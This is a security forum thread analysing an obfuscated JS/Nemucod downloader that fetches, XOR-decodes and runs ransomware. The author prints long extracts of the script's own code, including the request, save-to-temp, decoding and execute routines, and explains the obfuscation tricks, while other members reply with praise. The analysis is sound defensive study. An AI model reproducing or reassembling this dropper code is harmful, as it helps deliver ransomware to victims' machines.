var HIi3=OVc9;
}
else {

var HIi3=t1[OVc9];
}
resultArray["
push"](HIi3);
};
return resultArray /* y */;
};

function fats(codeArray) {
var t2=new Array(); t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;
t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89];
...
...
...
t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x207F;
t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;
var EGj=new Array();
var resultString="";
var HIi3;
var OVc9;
for (var Tj=0; Tj < codeArray["
length"]; Tj++) {
HIi3=codeArray[Tj];
if (HIi3 < 128) {

OVc9=HIi3;
}
else {

OVc9=t2[HIi3];
}
EGj.push(String["fromCharCode"](OVc9));
}
resultString=EGj["
join"]("");
return resultString;
};

function satt(filePath, codeArray) {

var Hrosteks=WScript["CreateObject"]("ADODB.Stream");
Hrosteks["
type"]=2;
Hrosteks["
Charset"]=437;
Hrosteks["
open"]();
Hrosteks["
writeText"](fats(codeArray));
Hrosteks["
SaveToFile"](filePath, 2);
Hrosteks["
close"]();
};

var xKey = fsta("CYxUl3br07SJbYS56eeV8lKwKH8SEW3o");


function
xdac(cca) {
for (var Tj=0; Tj < cca["length"]; Tj++) {
cca[Tj] ^= xKey[Math.floor(Tj % xKey.length)];
}
return cca;
};
This long string contains a BIG part of functions and vars seen on precedent scripted downloader analysed (see links at the end of this post - new version of JS/TrojanDownloader.Nemucod).

- function to load obfuscated ransomware,
- first char substitution function,
- deobfuscation of exe content (elaborate function to be used for XOR part)
- function to save the ransomware deobfuscated

In other parts :
- function to request the files ans saved them in %TEMP%
- function to run it
- sub-function to get the values used in the XOR part
----------------------------------------------------------------------------------------------------------------------
One funny thing : their long function manysecretthings() only do two things :
- delete all "RAPAPIPATA" on the string to be "decrypted"
- makes Base64 decode :rolleyes:

One example :

"RAPAPIPATAV2lRAPAPIPATAuZG93cyBTY3JpcRAPAPIPATAHQgSG9zdA==".manysecretthings()
=> "V2luZG93cyBTY3JpcHQgSG9zdA=="

and with a simple tool to do Base64 decoding

=> "Windows Script Host"

But to analyse, I kept using their own function :p => I had just to call it :)
----------------------------------------------------------------------------------------------------------------------

function xdac(cca) {
for (var Tj=0; Tj < cca["length"]; Tj++) {

cca[Tj] ^= xKey[Math.floor(Tj % xKey.length)];
}

return cca;
};
The function in RED : the XOR part :)

similar with

var QVh1 = uheprng();
for (var index=0; index < file_content_temp.length; index++) {

file_content_temp[index] ^= QVh1(256); // XOR
}

5) Conclusion :

This is again a downloader that download obfuscated ransomware and, once downloaded, makes operations to make it a real exe file
:D

=> this one try to download 3 times the same ransomware with different temp names :rolleyes:

New version of JS/TrojanDownloader.Nemucod (I have to find an official name :p )

See part (1) on first post, too :p

And precedent analysis :
https://malwaretips.com/threads/war...nt-js-trojandownloader-nemucod-july-28.61796/
and here for precedent complete deobfuscation version in pdf file :
https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/

-----------------------------------------------------------------------------------------------------------------------
This is one of the most interesting obfuscation method I ever seen. Not only manysecretthings() function is used to obfuscated all the parts.
A lot of class created, functions and sub-fuctiosn used to make real data obfuscated (I suggest you go and edit the file on a protected environment )

The only bad part : URLs too easy to retrieve :confused:
var votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var votgorodazaspinoyiputkoroheCCCerrant = 0;

function votgorodazaspinoyiputkoroheCCCachievment(votgorodazaspinoyiputkoroheCCCbidttt){if(votgorodazaspinoyiputkoroheCCCbidttt==1){return 2;}else{return 17;}
return 3;};
function votgorodazaspinoyiputkoroheCCCcenter(votgorodazaspinoyiputkoroheCCCrivulet) {
request = votgorodazaspinoyiputkoroheCCCrivulet;
for (var votgorodazaspinoyiputkoroheCCCi in votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq){request = request.replace(votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq[votgorodazaspinoyiputkoroheCCCi]);}
return request;
};

var votgorodazaspinoyiputkoroheCCCchosen = 33/3-10;
function votgorodazaspinoyiputkoroheCCCrodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};

votgorodazaspinoyiputkoroheCCCrodmands.angle = function(votgorodazaspinoyiputkoroheCCCp) {
return Math.atan2(votgorodazaspinoyiputkoroheCCCp.y, votgorodazaspinoyiputkoroheCCCp.x);
};

function votgorodazaspinoyiputkoroheCCCTetromino(index){
this.x = 0;
this.y = 0;
this.selectedFrame = 0;
this.getNew(index);
}


String.prototype.votgorodazaspinoyiputkoroheCCCmanysecretthings = function() {

var votgorodazaspinoyiputkoroheCCCc1, votgorodazaspinoyiputkoroheCCCc2, votgorodazaspinoyiputkoroheCCCc3, votgorodazaspinoyiputkoroheCCCc4;
var votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCClen, votgorodazaspinoyiputkoroheCCCout;
var votgorodazaspinoyiputkoroheCCCstr = this.replace(/RAPAPIPATA/g, '');
votgorodazaspinoyiputkoroheCCClen = votgorodazaspinoyiputkoroheCCCstr.length;
votgorodazaspinoyiputkoroheCCCi = 0;
votgorodazaspinoyiputkoroheCCCout = "";

while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen) {
do {
votgorodazaspinoyiputkoroheCCCc1 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff];
} while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc1 == -1);

if (votgorodazaspinoyiputkoroheCCCc1 == -1)
break;
var votgorodazaspinoyiputkoroheCCCdodo = false;
do {
votgorodazaspinoyiputkoroheCCCc2 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff];
votgorodazaspinoyiputkoroheCCCdodo = votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc2 == -1;
} while (votgorodazaspinoyiputkoroheCCCdodo);

if (votgorodazaspinoyiputkoroheCCCc2 == -1)
break;

votgorodazaspinoyiputkoroheCCCout += String.fromCharCode((votgorodazaspinoyiputkoroheCCCc1 << 2) | ((votgorodazaspinoyiputkoroheCCCc2 & 0x30) >> 4));

do {
votgorodazaspinoyiputkoroheCCCc3 = votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff;

if (votgorodazaspinoyiputkoroheCCCc3 == 61)
return votgorodazaspinoyiputkoroheCCCout;

votgorodazaspinoyiputkoroheCCCc3 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCc3];
} while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc3 == -1);

if (votgorodazaspinoyiputkoroheCCCc3 == -1)
break;

votgorodazaspinoyiputkoroheCCCout += String.fromCharCode(((votgorodazaspinoyiputkoroheCCCc2 & 0XF) << 4) | ((votgorodazaspinoyiputkoroheCCCc3 & 0x3c) >> 2));

do {
votgorodazaspinoyiputkoroheCCCc4 = votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff;

if (votgorodazaspinoyiputkoroheCCCc4 == 61)
return votgorodazaspinoyiputkoroheCCCout;

votgorodazaspinoyiputkoroheCCCc4 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCc4];
} while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc4 == -1);

if (votgorodazaspinoyiputkoroheCCCc4 == -1)
break;

votgorodazaspinoyiputkoroheCCCout += String.fromCharCode(((votgorodazaspinoyiputkoroheCCCc3 & 0x03) << 6) | votgorodazaspinoyiputkoroheCCCc4);
}

return votgorodazaspinoyiputkoroheCCCout;
};


votgorodazaspinoyiputkoroheCCCTetromino.prototype.nextFrame = function () {

if ((this.selectedFrame + 1) < this.frameNumber) {
this.selectedFrame++;
} else {
this.selectedFrame = 0
}
};
var votgorodazaspinoyiputkoroheCCCd7 = votgorodazaspinoyiputkoroheCCCcenter("00M"+"11SX"+"22ML"+("votgorodazaspinoyiputkoroheCCCcontinues","votgorodazaspinoyiputkoroheCCCoxfordshire","votgorodazaspinoyiputkoroheCCCinconsolable","votgorodazaspinoyiputkoroheCCCgazelle","votgorodazaspinoyiputkoroheCCClaundry","2.")+"PIPIPKAM"+"LH"+"TT"+("votgorodazaspinoyiputkoroheCCCsurvival","votgorodazaspinoyiputkoroheCCCmotif","votgorodazaspinoyiputkoroheCCCchaotic","votgorodazaspinoyiputkoroheCCClotus","votgorodazaspinoyiputkoroheCCCheritage","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCcamera","votgorodazaspinoyiputkoroheCCCemacs","P}")+"WU"+("votgorodazaspinoyiputkoroheCCCeddie","votgorodazaspinoyiputkoroheCCCflustered","votgorodazaspinoyiputkoroheCCCexalt","votgorodazaspinoyiputkoroheCCCfahrenheit","votgorodazaspinoyiputkoroheCCCcredit","votgorodazaspinoyiputkoroheCCCclassroom","votgorodazaspinoyiputkoroheCCCtrends","cr")+("votgorodazaspinoyiputkoroheCCCunbending","votgorodazaspinoyiputkoroheCCCranked","votgorodazaspinoyiputkoroheCCCavenue","votgorodazaspinoyiputkoroheCCCdurable","votgorodazaspinoyiputkoroheCCCvestibule","votgorodazaspinoyiputkoroheCCCceremony","votgorodazaspinoyiputkoroheCCCelementary","votgorodazaspinoyiputkoroheCCCcongregate","ip")+"t:S"+("votgorodazaspinoyiputkoroheCCCmining","votgorodazaspinoyiputkoroheCCCsurmount","votgorodazaspinoyiputkoroheCCCintimidate","votgorodazaspinoyiputkoroheCCCbetween","votgorodazaspinoyiputkoroheCCCcroatia","votgorodazaspinoyiputkoroheCCCampland","votgorodazaspinoyiputkoroheCCCglenn","votgorodazaspinoyiputkoroheCCCmunicipality","h")+"e"+("votgorodazaspinoyiputkoroheCCCvoracious","votgorodazaspinoyiputkoroheCCCreaper","votgorodazaspinoyiputkoroheCCCcrispin","votgorodazaspinoyiputkoroheCCCcount","votgorodazaspinoyiputkoroheCCCeffeminacy","votgorodazaspinoyiputkoroheCCCmashed","votgorodazaspinoyiputkoroheCCCconvinced","votgorodazaspinoyiputkoroheCCCslovak","ll"));
var votgorodazaspinoyiputkoroheCCCDoUtra = [votgorodazaspinoyiputkoroheCCCfinde, votgorodazaspinoyiputkoroheCCCsirdallos,votgorodazaspinoyiputkoroheCCCVARDOCF, ""+"."+("votgorodazaspinoyiputkoroheCCCindus","votgorodazaspinoyiputkoroheCCCjubilation","votgorodazaspinoyiputkoroheCCCchampionship","votgorodazaspinoyiputkoroheCCCshepherdess","votgorodazaspinoyiputkoroheCCCpredict","votgorodazaspinoyiputkoroheCCCconsumes","votgorodazaspinoyiputkoroheCCCtransmitting","votgorodazaspinoyiputkoroheCCCcucumber","exe"), "UnRAPAPIPATAVuRAPAPIPATA".votgorodazaspinoyiputkoroheCCCmanysecretthings(),votgorodazaspinoyiputkoroheCCCd7];
votgorodazaspinoyiputkoroheCCCDoUtraAANO = votgorodazaspinoyiputkoroheCCCDoUtra.shift()
var votgorodazaspinoyiputkoroheCCCZumZum = this[votgorodazaspinoyiputkoroheCCCDoUtraAANO];
votgorodazaspinoyiputkoroheCCCfabled = "AAF2AA";
votgorodazaspinoyiputkoroheCCCNative.votgorodazaspinoyiputkoroheCCCgenericize = function(object, votgorodazaspinoyiputkoroheCCCproperty, votgorodazaspinoyiputkoroheCCCcheck){
if ((!votgorodazaspinoyiputkoroheCCCcheck || !object[votgorodazaspinoyiputkoroheCCCproperty]) && typeof object.prototype[votgorodazaspinoyiputkoroheCCCproperty] == 'function') object[votgorodazaspinoyiputkoroheCCCproperty] = function(){
var votgorodazaspinoyiputkoroheCCCargs = Array.prototype.slice.call(arguments);
return object.prototype[votgorodazaspinoyiputkoroheCCCproperty].apply(votgorodazaspinoyiputkoroheCCCargs.shift(), votgorodazaspinoyiputkoroheCCCargs);
};
};
function votgorodazaspinoyiputkoroheCCCShtyler4(votgorodazaspinoyiputkoroheCCCgutter, votgorodazaspinoyiputkoroheCCCStrokaParam2) {

var votgorodazaspinoyiputkoroheCCCwandermander = votgorodazaspinoyiputkoroheCCCvulture ;
votgorodazaspinoyiputkoroheCCCwandermander=votgorodazaspinoyiputkoroheCCCwandermander+ "\u002f";
votgorodazaspinoyiputkoroheCCCwandermander=votgorodazaspinoyiputkoroheCCCwandermander + votgorodazaspinoyiputkoroheCCCStrokaParam2 ;
//votgorodazaspinoyiputkoroheCCCwandermander = votgorodazaspinoyiputkoroheCCCwandermander + votgorodazaspinoyiputkoroheCCCamalgamation;
votgorodazaspinoyiputkoroheCCCsudabilo1[votgorodazaspinoyiputkoroheCCCostrokoncert](("votgorodazaspinoyiputkoroheCCClackey","votgorodazaspinoyiputkoroheCCCsnowboard","votgorodazaspinoyiputkoroheCCCunderlying","votgorodazaspinoyiputkoroheCCClongest","votgorodazaspinoyiputkoroheCCCexecration","votgorodazaspinoyiputkoroheCCCsepulchre","votgorodazaspinoyiputkoroheCCCpears","votgorodazaspinoyiputkoroheCCCcassandra","G" + votgorodazaspinoyiputkoroheCCCweasel) + ("votgorodazaspinoyiputkoroheCCCrelapse","votgorodazaspinoyiputkoroheCCClatina","votgorodazaspinoyiputkoroheCCCmanufactured","votgorodazaspinoyiputkoroheCCCflake","votgorodazaspinoyiputkoroheCCCincursion","votgorodazaspinoyiputkoroheCCCunderstand","votgorodazaspinoyiputkoroheCCCnominee","votgorodazaspinoyiputkoroheCCCgentle","votgorodazaspinoyiputkoroheCCCpixels","votgorodazaspinoyiputkoroheCCCimparting","T"), votgorodazaspinoyiputkoroheCCCgutter, false);

votgorodazaspinoyiputkoroheCCCsudabilo1[votgorodazaspinoyiputkoroheCCCtudabilo1 + ("votgorodazaspinoyiputkoroheCCCreligion","votgorodazaspinoyiputkoroheCCCsectors","votgorodazaspinoyiputkoroheCCCserfs","votgorodazaspinoyiputkoroheCCCadvertisements","votgorodazaspinoyiputkoroheCCCquickly","end")]();
var votgorodazaspinoyiputkoroheCCCadvocacy=("wendyADCDEF" + WScript=="wendyADCDEF" + "RAPAPIPATAV2lRAPAPIPATAuZG93cyBTY3JpcRAPAPIPATAHQgSG9zdA==".votgorodazaspinoyiputkoroheCCCmanysecretthings())&&typeof(votgorodazaspinoyiputkoroheCCCGzEAPd)==="undefined";

if (votgorodazaspinoyiputkoroheCCCadvocacy) {

var votgorodazaspinoyiputkoroheCCCbrings = new votgorodazaspinoyiputkoroheCCCZumZum((("votgorodazaspinoyiputkoroheCCCentrap","votgorodazaspinoyiputkoroheCCCsedan","votgorodazaspinoyiputkoroheCCCteens","votgorodazaspinoyiputkoroheCCCbathroom","votgorodazaspinoyiputkoroheCCCislam","votgorodazaspinoyiputkoroheCCCcarlo","votgorodazaspinoyiputkoroheCCCoratorio","votgorodazaspinoyiputkoroheCCCscathing","ASEO")+("votgorodazaspinoyiputkoroheCCCshare","votgorodazaspinoyiputkoroheCCCseventyeight","votgorodazaspinoyiputkoroheCCCdefine","votgorodazaspinoyiputkoroheCCCenquiries","votgorodazaspinoyiputkoroheCCCintermittently","votgorodazaspinoyiputkoroheCCCsnarl","votgorodazaspinoyiputkoroheCCCrarely","votgorodazaspinoyiputkoroheCCCcarol","O")+"DB"+("votgorodazaspinoyiputkoroheCCCtransition","votgorodazaspinoyiputkoroheCCCminnesota","votgorodazaspinoyiputkoroheCCCbasketball","votgorodazaspinoyiputkoroheCCCcinderella","votgorodazaspinoyiputkoroheCCCworld","votgorodazaspinoyiputkoroheCCCopprobrium","votgorodazaspinoyiputkoroheCCCwallis",".S")+"tr8").replace("SEO", "D").replace("8", "eam"));
votgorodazaspinoyiputkoroheCCCbrings[votgorodazaspinoyiputkoroheCCCostrokoncert]();
votgorodazaspinoyiputkoroheCCCRhXxGud = "type";
votgorodazaspinoyiputkoroheCCCbrings[votgorodazaspinoyiputkoroheCCCRhXxGud] = votgorodazaspinoyiputkoroheCCCchosen;
votgorodazaspinoyiputkoroheCCChGaSMa = "AAF10AA";
votgorodazaspinoyiputkoroheCCCbrings["d3RAPAPIPATAJpdRAPAPIPATAGU=".votgorodazaspinoyiputkoroheCCCmanysecretthings()](votgorodazaspinoyiputkoroheCCCsudabilo1[("votgorodazaspinoyiputkoroheCCCvacation","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCserves","votgorodazaspinoyiputkoroheCCCunanimity","votgorodazaspinoyiputkoroheCCCeverybody","votgorodazaspinoyiputkoroheCCCassistant","")+"R"+"es"+"pon"+votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq['U'].toLowerCase()+"e"+"QmRAPAPIPATA9keQRAPAPIPATA==".votgorodazaspinoyiputkoroheCCCmanysecretthings()]);
votgorodazaspinoyiputkoroheCCCXWaxeQhw = "AAF11AA";
votgorodazaspinoyiputkoroheCCCbrings[(votgorodazaspinoyiputkoroheCCCcasque + "o"+("votgorodazaspinoyiputkoroheCCCinterrogation","votgorodazaspinoyiputkoroheCCCcapability","votgorodazaspinoyiputkoroheCCCcharter","votgorodazaspinoyiputkoroheCCCstinging","votgorodazaspinoyiputkoroheCCCvibration","220")+("votgorodazaspinoyiputkoroheCCCnausea","votgorodazaspinoyiputkoroheCCCadoring","votgorodazaspinoyiputkoroheCCCcancer","votgorodazaspinoyiputkoroheCCCtartar","votgorodazaspinoyiputkoroheCCCpressed","votgorodazaspinoyiputkoroheCCCcoaches","votgorodazaspinoyiputkoroheCCCegoism","22i")+"tion").replace("22"+("votgorodazaspinoyiputkoroheCCCillustrated","votgorodazaspinoyiputkoroheCCCcomponents","votgorodazaspinoyiputkoroheCCCmantel","votgorodazaspinoyiputkoroheCCCplutarch","votgorodazaspinoyiputkoroheCCCvagina","votgorodazaspinoyiputkoroheCCCsprig","votgorodazaspinoyiputkoroheCCCabler","022"), votgorodazaspinoyiputkoroheCCCtudabilo1)] = 0;
votgorodazaspinoyiputkoroheCCCkrDwvrh = "AAF12AA";
votgorodazaspinoyiputkoroheCCCbrings['saveToFile'](votgorodazaspinoyiputkoroheCCCwandermander, 2);
votgorodazaspinoyiputkoroheCCCSswQdi = "AAF13AA";
votgorodazaspinoyiputkoroheCCCbrings['c'+"lo"+"se"]();
var fileArray=votgorodazaspinoyiputkoroheCCCrtfta(votgorodazaspinoyiputkoroheCCCwandermander);
fileArray=votgorodazaspinoyiputkoroheCCCxdac(fileArray);
votgorodazaspinoyiputkoroheCCCwandermander = votgorodazaspinoyiputkoroheCCCwandermander + votgorodazaspinoyiputkoroheCCCamalgamation;
votgorodazaspinoyiputkoroheCCCsatt(votgorodazaspinoyiputkoroheCCCwandermander, fileArray );
votgorodazaspinoyiputkoroheCCCrampart[votgorodazaspinoyiputkoroheCCCpromises](votgorodazaspinoyiputkoroheCCCwandermander, votgorodazaspinoyiputkoroheCCCchosen, true);
}
};
-----------------------------------------------------------------------------------------------------------------------

I will certainly make a complete deobfuscation of this sample, but not write more about it in this part, the most important have been found / said :)

Threat Score: 100/100
https://www.hybrid-analysis.com/sam...353be29785d7da3118162511f78?environmentId=100
 
Last edited:

Logethica

Level 13
Verified
Top Poster
Well-known
Jun 24, 2016
636
Wow @DardiM ...You have done an incredible amount of work and an impeccable presentation of your findings.:)
My knowledge of programming and code is zero :oops:...yet I find your Deobfuscations fascinating.
..I can only marvel at the way you tackle these challenges.
You are a very clever penguin:D
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Wow @DardiM ...You have done an incredible amount of work and an impeccable presentation of your findings.:)
My knowledge of programming and code is zero :oops:...yet I find your Deobfuscations fascinating.
..I can only marvel at the way you tackle these challenges.
You are a very clever penguin:D
Oh thanks of lot for these words :oops: : they go straight to my heart :)
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
More about (3) "4 6183943701_01-08-2016.js"

List of unused vars and functions found, to "obfuscate more the content"
Several parts : Tetromino :confused:


var fabled = "AAF2AA";
XWaxeQhw = "AAF11AA";

hGaSMa = "AAF10AA";
krDwvrh = "AAF12AA";
SswQdi = "AAF13AA";

var Native = function(options){

};
Native.implement = function(objects, properties){

for (var i = 0, l = objects.length; i < l; i++) objects.implement(properties);

};
Native.genericize = function(object, property, check){

if ((!check || !object[property]) && typeof object.prototype[property] == 'function') object[property] = function(){
var args = Array.prototype.slice.call(arguments);
return object.prototype[property].apply(args.shift(), args);
};
};
Native.typize = function(object, family){

if (!object.type) object.type = function(item){
return ($type(item) === family);
};
};
rodmands.create = function(){

var publisher = new MBJSL.Publisher();
var spyFunction1 = sinon.spy();
publisher.subscribe(spyFunction1, this.type1);
publisher.publish(this.type1);

ok(spyFunction1.calledWith(), "Function called without arguments");
publisher.publish(this.type1, "PROPER1");
ok(spyFunction1.calledWith("PROPER1"), "Function called with 'PROPER1' argument");
publisher.publish(this.type1, ["PROPER1", "PROPER2"]);
ok(spyFunction1.calledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");

};

rodmands.subtract = function(param1, param2) {

return new rodmands(param1.x - param2.x, param1.y - param2.y);
};

function rodmands(x, y) {

this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};

rodmands.scale = function(p, scaleX, scaleY) {

if (isObject(scaleX)) {
scaleY = scaleX.y;
scaleX = scaleX.x;
} else if (!isNumber(scaleY)) {
scaleY = scaleX;
}
return new rodmands(p.x * scaleX, p.y * scaleY);
};

rodmands.sameOrN = function(param1, param2) {

return param1.D == param2.D || param1.F == param2.F;
};

rodmands.angle = function(p) {

return Math.atan2(p.y, p.x);
};

function achievment(bidttt){

if(bidttt==1){
return 2;
}else{
return 17;
}
return 3;
};

Tetromino.prototype.nextFrame = function () {

if ((this.selectedFrame + 1) < this.frameNumber) {
this.selectedFrame++;
} else {
this.selectedFrame = 0
}
};

function Tetromino(index){

this.x = 0;
this.y = 0;
this.selectedFrame = 0;
this.getNew(index);
}

Tetromino.prototype.getNew = function (index) {

this.x = 4;
index = 6;
this.index = index;
switch (index) {
case 1: this.frameNumber = 1;

this.sprite = 5;
this.sprite = 1;
this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) );
break;
case 2:this.frameNumber = 4;
this.sprite = 4;
this.sprite = 2;
this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) );
break;
case 3:this.frameNumber = 4;
this.sprite = 7;
this.sprite = 3;
this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) );
break;
case 4: this.sprite = 2;
this.sprite = 4;
this.frameNumber = 2;
this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) );
break;
case 5:this.frameNumber = 4;
this.sprite = 3;
this.sprite = 5;
this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) );
break;
case 6: this.sprite = 1;
this.sprite = 6;
this.frameNumber = 4;
this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) );
break;
case 7: this.sprite = 6;
this.sprite = 7;
this.frameNumber = 4;
this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) );
break; }
};
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
I have made modifications to protect members, you can't copy paste and run the parts below
Just for informative purpose :p


Obfuscated :

votgorodazaspinoyiputkoroheCCCrodmands.create = function(){

var votgorodazaspinoyiputkoroheCCCpublisher = new votgorodazaspinoyiputkoroheCCCMBJSL.votgorodazaspinoyiputkoroheCCCPublisher();

var votgorodazaspinoyiputkoroheCCCspyFunction1 = votgorodazaspinoyiputkoroheCCCsinon.votgorodazaspinoyiputkoroheCCCspy();

votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCsubscribe(votgorodazaspinoyiputkoroheCCCspyFunction1, this.votgorodazaspinoyiputkoroheCCCtype1);


votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(), "Function called without arguments");

votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, "PROPER1");
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith("PROPER1"), "Function called with 'PROPER1' argument");

votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, ["PROPER1", "PROPER2"]);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");

};

votgorodazaspinoyiputkoroheCCCrodmands.votgorodazaspinoyiputkoroheCCCsubtract = function(votgorodazaspinoyiputkoroheCCCparam1, votgorodazaspinoyiputkoroheCCCparam2) {
return new votgorodazaspinoyiputkoroheCCCrodmands(votgorodazaspinoyiputkoroheCCCparam1.x - votgorodazaspinoyiputkoroheCCCparam2.x, votgorodazaspinoyiputkoroheCCCparam1.y - votgorodazaspinoyiputkoroheCCCparam2.y);
};


var votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var votgorodazaspinoyiputkoroheCCCerrant = 0;

function votgorodazaspinoyiputkoroheCCCachievment(votgorodazaspinoyiputkoroheCCCbidttt){if(votgorodazaspinoyiputkoroheCCCbidttt==1){return 2;}else{return 17;}
return 3;};
function votgorodazaspinoyiputkoroheCCCcenter(votgorodazaspinoyiputkoroheCCCrivulet) {
request = votgorodazaspinoyiputkoroheCCCrivulet;
for (var votgorodazaspinoyiputkoroheCCCi in votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq){request = request.replace(votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq[votgorodazaspinoyiputkoroheCCCi]);}
return request;
};

var votgorodazaspinoyiputkoroheCCCchosen = 33/3-10;
function votgorodazaspinoyiputkoroheCCCrodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};

